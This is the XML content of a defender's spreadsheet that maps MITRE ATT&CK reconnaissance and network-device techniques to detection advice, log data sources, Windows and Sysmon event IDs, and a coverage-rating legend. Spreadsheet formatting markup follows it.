  <si>
    <t>Search Victim-Owned Websites</t>
  </si>
  <si>
    <t>Web logs</t>
  </si>
  <si>
    <t>Monitor for suspicious network traffic that could be indicative of adversary reconnaissance, such as rapid successions of requests indicative of web crawling and/or large quantities of requests originating from a single source (especially if the source is known to be associated with an adversary). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1595</t>
  </si>
  <si>
    <t>Active Scanning</t>
  </si>
  <si>
    <t>Packet capture,Network device logs</t>
  </si>
  <si>
    <t>Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.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</si>
  <si>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Before compromising a victim, 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</si>
  <si>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T1595.001</t>
  </si>
  <si>
    <t>Scanning IP Blocks</t>
  </si>
  <si>
    <t>Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).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</si>
  <si>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Before compromising a victim, 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</si>
  <si>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T1595.002</t>
  </si>
  <si>
    <t>Vulnerability Scanning</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1596</t>
  </si>
  <si>
    <t>Search Open Technical Databases</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1596.001</t>
  </si>
  <si>
    <t>DNS/Passive DNS</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1596.002</t>
  </si>
  <si>
    <t>WHOIS</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1596.003</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1596.004</t>
  </si>
  <si>
    <t>CDNs</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1596.005</t>
  </si>
  <si>
    <t>Scan Databases</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1597</t>
  </si>
  <si>
    <t>Search Closed Sources</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1597.001</t>
  </si>
  <si>
    <t>Threat Intel Vendors</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1597.002</t>
  </si>
  <si>
    <t>Purchase Technical Data</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1598</t>
  </si>
  <si>
    <t>Phishing for Information</t>
  </si>
  <si>
    <t>Social media monitoring,Mail server,Email gateway</t>
  </si>
  <si>
    <t>Depending on the specific method of spearphishing, the detections can vary. Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. Also consider enabling DMARC to verify the sender of emails.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
When it comes to following links, monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.
Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).</t>
  </si>
  <si>
    <t>Before compromising a victim, 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t>
  </si>
  <si>
    <t>T1598.001</t>
  </si>
  <si>
    <t>Spearphishing Service</t>
  </si>
  <si>
    <t>Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).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</si>
  <si>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Before compromising a victim, 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</si>
  <si>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T1598.002</t>
  </si>
  <si>
    <t>Mail server,Email gateway</t>
  </si>
  <si>
    <t>Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. Also consider enabling DMARC to verify the sender of emails.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1598.003</t>
  </si>
  <si>
    <t>Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. Also consider enabling DMARC to verify the sender of emails.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
Monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.</t>
  </si>
  <si>
    <t>Before compromising a victim, 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closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.</t>
  </si>
  <si>
    <t>T1599</t>
  </si>
  <si>
    <t>Network Boundary Bridging</t>
  </si>
  <si>
    <t>Consider monitoring network traffic on both interfaces of border network devices with out-of-band packet capture or network flow data, using a different device than the one in question.  Look for traffic that should be prohibited by the intended network traffic policy enforcement for the border network device.
Monitor the border network device’s configuration to validate that the policy enforcement sections are what was intended.  Look for rules that are less restrictive, or that allow specific traffic types that were not previously authorized.</t>
  </si>
  <si>
    <t>Adversaries may bridge network boundaries by compromising perimeter network devices.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In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.</t>
  </si>
  <si>
    <t>Router ACL,Firewall</t>
  </si>
  <si>
    <t>T1599.001</t>
  </si>
  <si>
    <t>Network Address Translation Traversal</t>
  </si>
  <si>
    <t>Consider monitoring network traffic on both interfaces of border network devices.  Compare packets transmitted by the device between networks to look for signs of NAT being implemented.  Packets which have their IP addresses changed should still have the same size and contents in the data encapsulated beyond Layer 3.  In some cases, Port Address Translation (PAT) may also be used by an adversary.
Monitor the border network device’s configuration to determine if any unintended NAT rules have been added without authorization.</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</si>
  <si>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</si>
  <si>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T1600</t>
  </si>
  <si>
    <t>Weaken Encryption</t>
  </si>
  <si>
    <t>There is no documented method for defenders to directly identify behaviors that weaken encryption. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601). Some detection methods require vendor support to aid in investigation.</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</si>
  <si>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</si>
  <si>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Encryption</t>
  </si>
  <si>
    <t>T1600.001</t>
  </si>
  <si>
    <t>Reduce Key Space</t>
  </si>
  <si>
    <t>There is no documented method for defenders to directly identify behaviors that reduce encryption key space. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.</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</si>
  <si>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</si>
  <si>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T1600.002</t>
  </si>
  <si>
    <t>Disable Crypto Hardware</t>
  </si>
  <si>
    <t>There is no documented method for defenders to directly identify behaviors that disable cryptographic hardware. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.</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</si>
  <si>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</si>
  <si>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T1601</t>
  </si>
  <si>
    <t>Modify System Image</t>
  </si>
  <si>
    <t>Network device run-time memory,Network device configuration,File monitoring</t>
  </si>
  <si>
    <t>Most embedded network devices provide a command to print the version of the currently running operating system.  Use this command to query the operating system for its version number and compare it to what is expected for the device in question.  Because this method may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. 
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  (Citation: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</si>
  <si>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</si>
  <si>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T1601.001</t>
  </si>
  <si>
    <t>Patch System Image</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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T1601.002</t>
  </si>
  <si>
    <t>Downgrade System Image</t>
  </si>
  <si>
    <t>Network device configuration,File monitoring</t>
  </si>
  <si>
    <t xml:space="preserve">Many embedded network devices provide a command to print the version of the currently running operating system.  Use this command to query the operating system for its version number and compare it to what is expected for the device in question.  Because image downgrade may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. </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</si>
  <si>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</si>
  <si>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T1602</t>
  </si>
  <si>
    <t>Data from Configuration Repository</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Network protocol analysis,Packet capture</t>
  </si>
  <si>
    <t>Identify network traffic sent or received by untrusted hosts or networks that solicits and obtains the configuration information of the queried device.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)</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</si>
  <si>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</si>
  <si>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T1602.001</t>
  </si>
  <si>
    <t>SNMP (MIB Dump)</t>
  </si>
  <si>
    <t>Identify network traffic sent or received by untrusted hosts or networks that expose MIB content or use unauthorized protocols.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)</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</si>
  <si>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</si>
  <si>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T1602.002</t>
  </si>
  <si>
    <t>Network Device Configuration Dump</t>
  </si>
  <si>
    <t>Identify network traffic sent or received by untrusted hosts or networks. Configure signatures to identify strings that may be found in a network device configuration. (Citation: US-CERT TA18-068A 2018)</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</si>
  <si>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 (Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) (Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. </t>
  </si>
  <si>
    <t>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or related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Endgame Predicting DGA)</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</si>
  <si>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Access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</si>
  <si>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profiliers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Access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</si>
  <si>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Use case</t>
  </si>
  <si>
    <t>Data source(s) used</t>
  </si>
  <si>
    <t>Upkeep</t>
  </si>
  <si>
    <t>REF: Datasources mentioned in the framework</t>
  </si>
  <si>
    <t>123-zxy-name</t>
  </si>
  <si>
    <t>Process use of network,Process Monitoring</t>
  </si>
  <si>
    <t>123-zxy-name2</t>
  </si>
  <si>
    <t>Process Monitoring, Process command-line parameters</t>
  </si>
  <si>
    <t>123-zxy-mimilove</t>
  </si>
  <si>
    <t>Rating Legend</t>
  </si>
  <si>
    <t>Per event</t>
  </si>
  <si>
    <t>Completeness</t>
  </si>
  <si>
    <t>number, min 0 max 5</t>
  </si>
  <si>
    <t>The amount of systems that have this event type available out of the total amount of systems that could be able to have it</t>
  </si>
  <si>
    <t>Timeliness</t>
  </si>
  <si>
    <t>Hours = 1, under 30 minutes = 3, under 5 minutes to real-time = 5</t>
  </si>
  <si>
    <t>Availability</t>
  </si>
  <si>
    <t>Not available = 0, Locally available = 2, Centrally available = 5</t>
  </si>
  <si>
    <t>Per datasource</t>
  </si>
  <si>
    <t>0 - 100</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">It should add up to 100 per </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>DataSource</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>, separated by a ;</t>
    </r>
  </si>
  <si>
    <t>The total amount of DataSources per technique needs to be equal to the amount of weights</t>
  </si>
  <si>
    <t>DataSource</t>
  </si>
  <si>
    <t>Event</t>
  </si>
  <si>
    <t>Access Tokens</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>TrendMicro</t>
  </si>
  <si>
    <t>Symantec</t>
  </si>
  <si>
    <t>Kaspersky</t>
  </si>
  <si>
    <t>Windows Defender:1116,1117,1006,1008</t>
  </si>
  <si>
    <t>Asset management</t>
  </si>
  <si>
    <t>Windows:4624</t>
  </si>
  <si>
    <t>Windows:4625</t>
  </si>
  <si>
    <t>Windows:4769</t>
  </si>
  <si>
    <t>AWS CloudTrail logs</t>
  </si>
  <si>
    <t>AWS OS logs</t>
  </si>
  <si>
    <t>Azure activity logs</t>
  </si>
  <si>
    <t>Azure OS logs</t>
  </si>
  <si>
    <t>BIOS</t>
  </si>
  <si>
    <t>Component firmware</t>
  </si>
  <si>
    <t>Data loss prevention</t>
  </si>
  <si>
    <t>Windows:4657</t>
  </si>
  <si>
    <t>Detonation Chamber</t>
  </si>
  <si>
    <t>Cuckoo sandbox</t>
  </si>
  <si>
    <t>FireEye</t>
  </si>
  <si>
    <t>Digital Certificate Logs</t>
  </si>
  <si>
    <t>Bro Cert.log</t>
  </si>
  <si>
    <t>Disk Forensics</t>
  </si>
  <si>
    <t>DLL monitoring</t>
  </si>
  <si>
    <t>Sysmon:7</t>
  </si>
  <si>
    <t>DNS Records</t>
  </si>
  <si>
    <t>Windows DNS log</t>
  </si>
  <si>
    <t xml:space="preserve">Infoblox </t>
  </si>
  <si>
    <t>Sysmon:22</t>
  </si>
  <si>
    <t>EFI</t>
  </si>
  <si>
    <t>Email gateway</t>
  </si>
  <si>
    <t>Environment variable</t>
  </si>
  <si>
    <t>Windows:4663</t>
  </si>
  <si>
    <t>Sysmon:2</t>
  </si>
  <si>
    <t>Sysmon:11</t>
  </si>
  <si>
    <t>Sysmon:15</t>
  </si>
  <si>
    <t>Windows:5140,5145</t>
  </si>
  <si>
    <t>Windows:4656</t>
  </si>
  <si>
    <t>Windows:4670</t>
  </si>
  <si>
    <t>Host network interface</t>
  </si>
  <si>
    <t>Kernel drivers</t>
  </si>
  <si>
    <t>Sysmon:6</t>
  </si>
  <si>
    <t>Windows:5038,6281</t>
  </si>
  <si>
    <t>Loaded DLLs</t>
  </si>
  <si>
    <t>Mail server</t>
  </si>
  <si>
    <t>Malware reverse engineering</t>
  </si>
  <si>
    <t>Palo Alto:WildFire</t>
  </si>
  <si>
    <t>MBR</t>
  </si>
  <si>
    <t>Named Pipes</t>
  </si>
  <si>
    <t>Sysmon:17</t>
  </si>
  <si>
    <t>Sysmon:18</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>Network device logs</t>
  </si>
  <si>
    <t>Palo Alto:DeviceLog</t>
  </si>
  <si>
    <t>Network intrusion detection system</t>
  </si>
  <si>
    <t>Network protocol analysis</t>
  </si>
  <si>
    <t>Bro logging</t>
  </si>
  <si>
    <t>PaloAlto:TrafficLog</t>
  </si>
  <si>
    <t>OAuth audit logs</t>
  </si>
  <si>
    <t>Office 365 account logs</t>
  </si>
  <si>
    <t>Office 365 trace logs</t>
  </si>
  <si>
    <t>Packet capture</t>
  </si>
  <si>
    <t>Moloch</t>
  </si>
  <si>
    <t>PowerShell logs</t>
  </si>
  <si>
    <t>PowerShell:200-500</t>
  </si>
  <si>
    <t>PowerShell:4100-4104</t>
  </si>
  <si>
    <t>Process command-line parameters</t>
  </si>
  <si>
    <t>Windows:4688</t>
  </si>
  <si>
    <t>Sysmon:1</t>
  </si>
  <si>
    <t>Windows:4689</t>
  </si>
  <si>
    <t>Sysmon:5</t>
  </si>
  <si>
    <t>Sysmon:8</t>
  </si>
  <si>
    <t>Sysmon:10</t>
  </si>
  <si>
    <t>Windows Scheduled Tasks:100-200</t>
  </si>
  <si>
    <t>Windows Whitelist:8000-8027</t>
  </si>
  <si>
    <t>Process use of network</t>
  </si>
  <si>
    <t>Windows:5156</t>
  </si>
  <si>
    <t>Sysmon:3</t>
  </si>
  <si>
    <t>Windows:5157</t>
  </si>
  <si>
    <t>Windows:5158</t>
  </si>
  <si>
    <t>Windows:5159</t>
  </si>
  <si>
    <t>Windows:5031</t>
  </si>
  <si>
    <t>Windows:5154</t>
  </si>
  <si>
    <t>Windows:5155</t>
  </si>
  <si>
    <t>Sensor health and status</t>
  </si>
  <si>
    <t>Sysmon:4</t>
  </si>
  <si>
    <t>Sysmon:16</t>
  </si>
  <si>
    <t>Windows:6005</t>
  </si>
  <si>
    <t>Windows Defender:1005,1006,1008,1010,2001,2003,2004,3002,5008</t>
  </si>
  <si>
    <t>Windows:1100</t>
  </si>
  <si>
    <t>Services</t>
  </si>
  <si>
    <t>Windows Firewall:2003</t>
  </si>
  <si>
    <t>Windows:7040</t>
  </si>
  <si>
    <t>Windows:7045</t>
  </si>
  <si>
    <t>SSL/TLS inspection</t>
  </si>
  <si>
    <t>Palo Alto:ThreatLog</t>
  </si>
  <si>
    <t>BlueCoat trafficlog</t>
  </si>
  <si>
    <t>Stackdriver logs</t>
  </si>
  <si>
    <t>Third-party application logs</t>
  </si>
  <si>
    <t>User interface</t>
  </si>
  <si>
    <t>VBR</t>
  </si>
  <si>
    <t>Web application firewall logs</t>
  </si>
  <si>
    <t>F5 logs</t>
  </si>
  <si>
    <t>Nginx logs</t>
  </si>
  <si>
    <t>Web proxy</t>
  </si>
  <si>
    <t>Windows Error Reporting</t>
  </si>
  <si>
    <t>Windows:1000,1001</t>
  </si>
  <si>
    <t>Windows:4724, 4738,4728,4732</t>
  </si>
  <si>
    <t>Windows:1102</t>
  </si>
  <si>
    <t>Windows Registry</t>
  </si>
  <si>
    <t>Sysmon:12</t>
  </si>
  <si>
    <t>Sysmon:13</t>
  </si>
  <si>
    <t>Sysmon:14</t>
  </si>
  <si>
    <t>Windows:4660</t>
  </si>
  <si>
    <t>WMI Objects</t>
  </si>
  <si>
    <t>Windows WMI:5857,5860,5861</t>
  </si>
  <si>
    <t>Sysmon:19</t>
  </si>
  <si>
    <t>Sysmon:20</t>
  </si>
  <si>
    <t>Sysmon:21</t>
  </si>
  <si>
    <t>Binary file metadata,File monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Binary file metadata,File monitoring,Malware reverse engineering</t>
  </si>
  <si>
    <t>File monitoring,Process use of network,Process monitoring</t>
  </si>
  <si>
    <t>API monitoring,BIOS,EFI</t>
  </si>
  <si>
    <t>File monitoring,Authentication logs,Netflow/Enclave netflow,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Malware reverse engineering,Process use of network,Process monitoring,SSL/TLS inspection</t>
  </si>
  <si>
    <t>File monitoring,DLL monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>File monitoring,Services,Process command-line parameters</t>
  </si>
  <si>
    <t>User interface,Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis</t>
  </si>
  <si>
    <t>Data loss prevention,File monitoring</t>
  </si>
  <si>
    <t>Sensor health and status,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>API monitoring,Windows Registry,File monitoring,DLL monitoring,Process monitoring,Named Pipes</t>
  </si>
  <si>
    <t>Windows Registry,Kernel drivers,Process monitoring,API monitoring</t>
  </si>
  <si>
    <t>Process command-line parameters,Services,Windows Registry</t>
  </si>
  <si>
    <t>Process use of network,Process monitoring,Process command-line parameters,Anti-virus,Binary file metadata</t>
  </si>
  <si>
    <t>API monitoring,MBR,VBR</t>
  </si>
  <si>
    <t>File monitoring,Third-party application logs,Windows Registry,Process monitoring,Process use of network,Binary file metadata</t>
  </si>
  <si>
    <t>Process use of network,Process monitoring,Loaded DLLs</t>
  </si>
  <si>
    <t>Authentication logs,Netflow/Enclave netflow,Process monitoring</t>
  </si>
  <si>
    <t>Process use of network,Authentication logs,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Packet capture,Process use of network,Malware reverse engineering,Process monitoring</t>
  </si>
  <si>
    <t>PowerShell logs,Loaded DLLs,DLL monitoring,Windows Registry,File monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>System calls,Process monitoring,Authentication logs,Process command-line parameters</t>
  </si>
  <si>
    <t>API monitoring,File monitoring,Services,Windows Registry,Process command-line parameters,Anti-virus</t>
  </si>
  <si>
    <t>Process use of network,Process monitoring,Netflow/Enclave netflow,Packet capture</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring,Host network interface,Network intrusion detection system,Network protocol analysis</t>
  </si>
  <si>
    <t>File monitoring,Kernel drivers,API monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Authentication logs,API monitoring,Windows event logs,Packet capture</t>
  </si>
  <si>
    <t>Anti-virus,Authentication logs,File monitoring,Netflow/Enclave netflow,Process monitoring</t>
  </si>
  <si>
    <t>Loaded DLLs,Process monitoring,Windows Registry</t>
  </si>
  <si>
    <t>File monitoring,Packet capture,Process use of network,Netflow/Enclave netflow,Network protocol analysis,Process monitoring</t>
  </si>
  <si>
    <t>API monitoring,Process monitoring</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Binary file metadata</t>
  </si>
  <si>
    <t>Disk forensics,API monitoring,Process monitoring,Component firmware</t>
  </si>
  <si>
    <t>Loaded DLLs,Process monitoring,Windows Registry,Process command-line parameters</t>
  </si>
  <si>
    <t>Windows Registry,DLL monitoring,Loaded DLLs</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Packet capture,Authentication logs</t>
  </si>
  <si>
    <t>DLL monitoring,Windows Registry,Process monitoring</t>
  </si>
  <si>
    <t>API monitoring,Access tokens,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Windows Registry,File monitoring</t>
  </si>
  <si>
    <t>Loaded DLLs,System calls,Windows Registry,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,User interface,PowerShell logs</t>
  </si>
  <si>
    <t>Windows event logs,PowerShell logs,Process command-line parameters,Process monitoring,File monitoring</t>
  </si>
  <si>
    <t>Process monitoring,Authentication logs,File monitoring,Environment variable</t>
  </si>
  <si>
    <t>API monitoring,System calls,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters,Process use of network</t>
  </si>
  <si>
    <t>Binary file metadata,Process monitoring,Process command-line parameters,File monitoring</t>
  </si>
  <si>
    <t>API monitoring,DLL monitoring,Process monitoring,Windows Registry,Windows event logs</t>
  </si>
  <si>
    <t>DLL monitoring,Process monitoring,Windows Registry</t>
  </si>
  <si>
    <t>Network protocol analysis,Packet capture,System calls,Process use of network,Process monitoring,Browser extensions</t>
  </si>
  <si>
    <t>API monitoring,DLL monitoring,File monitoring,Kernel drivers,Loaded DLLs,Process monitoring</t>
  </si>
  <si>
    <t>API monitoring,Authentication logs,Windows event logs</t>
  </si>
  <si>
    <t>API monitoring,Binary file metadata,DLL monitoring,Loaded DLLs,Process monitoring,Windows event logs</t>
  </si>
  <si>
    <t>Process monitoring,Windows Registry,Windows event logs</t>
  </si>
  <si>
    <t>Network protocol analysis,Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Process use of network,Windows event logs</t>
  </si>
  <si>
    <t>API monitoring,Binary file metadata,DLL monitoring,Windows Registry,Windows event logs,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>API monitoring,Packet capture,Windows event logs</t>
  </si>
  <si>
    <t>API monitoring,Application logs,DLL monitoring,Loaded DLLs,Process monitoring,Windows Registry,Windows event logs</t>
  </si>
  <si>
    <t>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,OAuth audit logs,Application logs,Authentication logs,Data loss prevention,Third-party application logs</t>
  </si>
  <si>
    <t>System calls,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Process use of network,Packet capture,Network device logs,Netflow/Enclave netflow,DNS records</t>
  </si>
  <si>
    <t>Kernel drivers,MBR</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,Windows Registry,API monitoring</t>
  </si>
  <si>
    <t>Windows event logs,Process monitoring,API monitoring</t>
  </si>
  <si>
    <t>Process monitoring,PowerShell logs,File monitoring,API monitoring</t>
  </si>
  <si>
    <t>Process monitoring,File monitoring,PowerShell logs</t>
  </si>
  <si>
    <t>Azure activity logs,AWS CloudTrail logs,Authentication logs</t>
  </si>
  <si>
    <t>OAuth audit logs,Office 365 account logs</t>
  </si>
  <si>
    <t>Azure OS logs,AWS CloudTrail logs,Azure activity logs,Stackdriver logs,AWS OS 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</si>
</sst>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rgb="FF0C1B33"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="0"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FF0C1B33"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FF333333"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <color theme="0"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>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C1B33"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="8" tint="0.39994506668294322"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="7">
    <border>
      <left/>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color theme="4"/>
      </left>
      <right/>
      <top style="thin">
        <color theme="4"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color theme="4"/>
      </left>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFCCCCCC"/>
      </left>
      <right style="medium">
        <color rgb="FFCCCCCC"/>
      </right>
      <top style="medium">
        <color rgb="FFCCCCCC"/>
      </top>
      <bottom style="medium">
        <color rgb="FFCCCCCC"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="thin">
        <color indexed="64"/>
      </right>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color theme="4"/>
      </left>
      <right style="thin">
        <color indexed="64"/>
      </right>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color rgb="FF4472C4"/>
      </left>
      <right/>
      <top style="thin">
        <color rgb="FF4472C4"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="2">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="1" fillId="4" borderId="0"/>
  </cellStyleXfs>
  <cellXfs count="57">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="1" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0"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xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="1" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center"/>
    </xf>
